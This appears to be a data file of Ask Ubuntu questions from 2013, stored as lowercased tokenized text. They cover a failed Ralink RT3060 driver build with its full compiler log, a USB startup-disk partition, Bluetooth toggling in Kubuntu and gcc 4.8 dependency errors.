286370	rt3060 wireless on ubuntu 13.04	my wireless connection is working fine on my newly installed ubuntu 13.04 . but im trying to improve my wireless connection by installing the driver . the stock driver that is built into ubuntu has weak signal here are my wireless card details ( done via `` lspci -v '' ) 04:00.0 network controller : ralink corp. rt3060 wireless 802.11n 1t/1r subsystem : ralink corp. rt3060 wireless 802.11n 1t/1r flags : bus master , slow devsel , latency 32 , irq 21 memory at fb100000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 kernel driver in use : rt2800pci i had downloaded dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217.tgz from ralink website ( now mediatek ) and did the following : sudo apt-get install -- reinstall linux-headers-generic build-essential dkms cd angepasster-dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/ sudo make clean sudo make sudo make install echo `` blacklist rt2800pci '' | sudo tee /etc/modprobe.d/blacklist-rt2800pci.conf sudo modprobe -rfv rt2800pci sudo modprobe -v rt3562sta however i run into errors that was not encountered in the past ubuntu versions ( 12.04 and 12.10 ) from the command `` make '' : make -c tools make [ 1 ] : entering directory `/home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/tools' /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/tools/bin2h cp -f os/linux/makefile.6 /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/makefile make -c /lib/modules/3.8.0-19-generic/build subdirs=/home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_md5.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_sha2.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_hmac.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c : in function ‘wscencryptdata’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c:1522:1 : warning : the frame size of 1408 bytes is larger than 1024 bytes [ -wframe-larger-than= ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c : in function ‘wscdecryptdata’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c:1592:1 : warning : the frame size of 1408 bytes is larger than 1024 bytes [ -wframe-larger-than= ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c : in function ‘aes_gtk_key_wrap’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c:2265:1 : warning : the frame size of 1608 bytes is larger than 1024 bytes [ -wframe-larger-than= ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c : in function ‘aes_gtk_key_unwrap’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_aes.c:2348:1 : warning : the frame size of 1144 bytes is larger than 1024 bytes [ -wframe-larger-than= ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/crypt_arc4.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/mlme.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/mlme.c : in function ‘mlmeresetralinkcounters’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/mlme.c:867:2 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/mlme.c:867:2 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/mlme.c : in function ‘bsstablesetentry’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/mlme.c:5657:39 : warning : operation on ‘tab- > bssoverlapnr’ may be undefined [ -wsequence-point ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_wep.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/action.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_data.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rtmp_init.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rtmp_init.c : in function ‘nicinitasicfromeeprom’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rtmp_init.c:1391:4 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 3 has type ‘ulong’ [ -wformat ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_tkip.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_aes.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_sync.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/eeprom.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_sanity.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_info.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_cfg.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_wpa.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/dfs.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/spectrum.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/spectrum.c : in function ‘peermeasurereportaction’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/spectrum.c:1966:3 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘long unsigned int’ [ -wformat ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rtmp_timer.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rt_channel.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_profile.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_asic.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_cmd.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/assoc.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/auth.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/auth_rsp.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/sync.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/sanity.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/rtmp_data.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/connect.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/wpa.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/ags.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../sta/sta_cfg.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rtmp_init_inf.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_profile.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.c : in function ‘rt_ioctl_iwaplist’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.c:596:1 : warning : the frame size of 1288 bytes is larger than 1024 bytes [ -wframe-larger-than= ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.c : in function ‘rtmpioctlmac’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.c:5844:1 : warning : the frame size of 1336 bytes is larger than 1024 bytes [ -wframe-larger-than= ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.c : in function ‘rtmpioctle2prom’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/sta_ioctl.c:6043:1 : warning : the frame size of 1344 bytes is larger than 1024 bytes [ -wframe-larger-than= ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘duplicate_pkt’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:482:3 : warning : passing argument 1 of ‘memmove’ makes pointer from integer without a cast [ enabled by default ] in file included from /usr/src/linux-headers-3.8.0-19-generic/arch/x86/include/asm/string.h:4:0 , from include/linux/string.h:17 , from include/linux/dynamic_debug.h:100 , from include/linux/kernel.h:14 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/include/os/rt_linux.h:31 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/include/rtmp_os.h:32 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/include/rt_config.h:60 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:28 : /usr/src/linux-headers-3.8.0-19-generic/arch/x86/include/asm/string_64.h:58:7 : note : expected ‘void *’ but argument is of type ‘sk_buff_data_t’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:484:3 : warning : passing argument 1 of ‘memmove’ makes pointer from integer without a cast [ enabled by default ] in file included from /usr/src/linux-headers-3.8.0-19-generic/arch/x86/include/asm/string.h:4:0 , from include/linux/string.h:17 , from include/linux/dynamic_debug.h:100 , from include/linux/kernel.h:14 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/include/os/rt_linux.h:31 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/include/rtmp_os.h:32 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/include/rt_config.h:60 , from /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:28 : /usr/src/linux-headers-3.8.0-19-generic/arch/x86/include/asm/string_64.h:58:7 : note : expected ‘void *’ but argument is of type ‘sk_buff_data_t’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘clonepacket’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:634:23 : warning : assignment makes integer from pointer without a cast [ enabled by default ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘update_os_packet_info’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:656:15 : warning : assignment makes integer from pointer without a cast [ enabled by default ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘wlan_802_11_to_802_3_packet’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:677:15 : warning : assignment makes integer from pointer without a cast [ enabled by default ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘send_monitor_packets’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:950:9 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘long unsigned int’ [ -wformat ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘rtmposnetdevdetach’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:1699:38 : warning : initialization discards ‘const’ qualifier from pointer target type [ enabled by default ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c : in function ‘rtmposnetdevattach’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_linux.c:1736:38 : warning : initialization discards ‘const’ qualifier from pointer target type [ enabled by default ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_main_dev.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_main_dev.c : in function ‘mainvirtualif_close’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_main_dev.c:118:13 : warning : unused variable ‘cancelled’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_main_dev.c : in function ‘writedatthread’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_main_dev.c:1250:3 : warning : ‘return’ with no value , in function returning non-void [ -wreturn-type ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/ba_action.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/ba_action.c : in function ‘convert_reordering_packet_to_preamsdu_or_802_3_packet’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/ba_action.c:1558:2 : warning : assignment makes integer from pointer without a cast [ enabled by default ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c : in function ‘rtmpresettxrxringmemory’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:36:13 : warning : unused variable ‘num’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c : in function ‘rtmpfreetxrxringmemory’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:119:16 : warning : unused variable ‘irqflags’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:118:16 : warning : unused variable ‘ppacket’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:117:15 : warning : unused variable ‘ptxd’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:116:16 : warning : unused variable ‘ptxring’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:115:19 : warning : unused variable ‘j’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:115:6 : warning : unused variable ‘index’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c : in function ‘rtmpalloctxrxringmemory’ : /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:447:11 : warning : unused variable ‘bufbaseva’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:446:11 : warning : unused variable ‘bufbasepalow’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:445:11 : warning : unused variable ‘bufbasepahigh’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:432:15 : warning : unused variable ‘ppacket’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:431:15 : warning : unused variable ‘pdmabuf’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:430:16 : warning : unused variable ‘ptxring’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:428:14 : warning : unused variable ‘prxd’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:427:14 : warning : unused variable ‘ptxd’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:425:10 : warning : unused variable ‘ringbaseva’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:424:10 : warning : unused variable ‘ringbasepalow’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:423:10 : warning : unused variable ‘ringbasepahigh’ [ -wunused-variable ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_mac_pci.c:489:4 : warning : ‘index’ may be used uninitialized in this function [ -wuninitialized ] cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/cmm_data_pci.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rtmp_mcu.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/ee_prom.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/ee_efuse.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../common/rt_rf.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../chips/rt30xx.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../chips/rt35xx.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_pci_rbus.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/rt_rbus_pci_util.o cc [ m ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.o /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:37:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:38:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:60:46 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘__devinitdata’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:101:17 : error : ‘rt2860_pci_tbl’ undeclared here ( not in a function ) /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:102:17 : error : ‘rt2860_probe’ undeclared here ( not in a function ) /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:104:5 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:104:29 : error : ‘rt2860_remove_one’ undeclared here ( not in a function ) /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:297:24 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:471:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:536:14 : warning : ‘rtmpinitpciedevice’ defined but not used [ -wunused-function ] /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.c:87:1 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘rt2860_pci_tbl’ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/../../os/linux/pci_main_dev.o ] error 1 make [ 1 ] : *** [ _module_/home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ linux ] error 2 /bin/rm : can not remove ‘/run/user/root/gvfs’ : is a directory from the command `` make install '' : make -c /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux -f makefile.6 install mkdir : can not create directory ‘/etc/wireless’ : file exists make [ 1 ] : entering directory `/home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux' rm -rf /etc/wireless/rt2860sta mkdir /etc/wireless/rt2860sta cp /home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/rt2860sta.dat /etc/wireless/rt2860sta/ . install -d /lib/modules/3.8.0-19-generic/kernel/drivers/net/wireless/ install -m 644 -c rt3562sta.ko /lib/modules/3.8.0-19-generic/kernel/drivers/net/wireless/ /sbin/depmod -a 3.8.0-19-generic make [ 1 ] : leaving directory `/home/stefan/desktop/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux' /bin/rm : can not remove ‘/run/user/root/gvfs’ : is a directory and lastly from the `` modprobe -v rt3562sta '' : insmod /lib/modules/3.8.0-19-generic/kernel/drivers/net/wireless/rt3562sta.ko error : could not insert 'rt3562sta ' : exec format error /bin/rm : can not remove ‘/run/user/root/gvfs’ : is a directory can someone enlighten me where went wrong ?
286372	creating a startup disk on a partition of a usb drive	i have a 32 gb usb pendrive which i 'd like to use as both a startup/installation disk for ubuntu , and for regular file storage/transfer purposes . since the ubuntu installation stuff only needs a little under 3 gb , i thought this would be no problem , but it has turned out to be harder than i thought . my plan was to create two partitions on the drive - one 4gb that i can wipe at any time and use for installation media , and one with the rest of the space that i can use for data ( and wo n't have to wipe when i create a new installation disk ) . creating the partitions posed no problems - gparted did that without complaining - but installing the ubuntu installation stuff has turned out to be harder than i thought . in the `` startup disc creator '' program , i ca n't select the usb drive 's partiions individually - just the entire drive . and if i do n't press `` erase disk '' , i 'm not allowed to start the installation . i 've tried setting the `` boot '' flag on the partition i want to use , but it did n't matter . it seems the startup disc creator program is n't `` partition aware '' - is it ? or do i need to do this with another program ? is there a way that i can create a bootable usb drive where just one partition is used for the installation media ? how ?
286378	can not turn off bluetooth in kubuntu 13.04	i have installed a fresh copy of kubuntu 13.04 . in it i could access bluetooth , wireless without any trouble . but i could not turn this off by just pressing the network button on the keyboard . it is always on . since i am new to kubuntu i do n't know how to figure this out .
286379	ca n't install gcc 4.8 , dependency issues	i tried downoading 4.8 for 12.04 from https : //launchpad.net/~ubuntu-toolchain-r/+archive/test/+packages ( i did not find for 13.04 as is mentioned here : how to install gcc-4.8 in ubuntu 12.04 from the terminal ) and i think i messed up trying to install it . apt-get install gcc-4.8 gives : the following packages have unmet dependencies : followed by a long list of packages and the recommendation : e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) but apt-get -f install says e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies please help i need it for the c++11 support update 04/28/2013 this was fixed with sudo apt-get clean followed by sudo apt-get update then apt-get upgrade -f many thanks to everyone for trying to help !
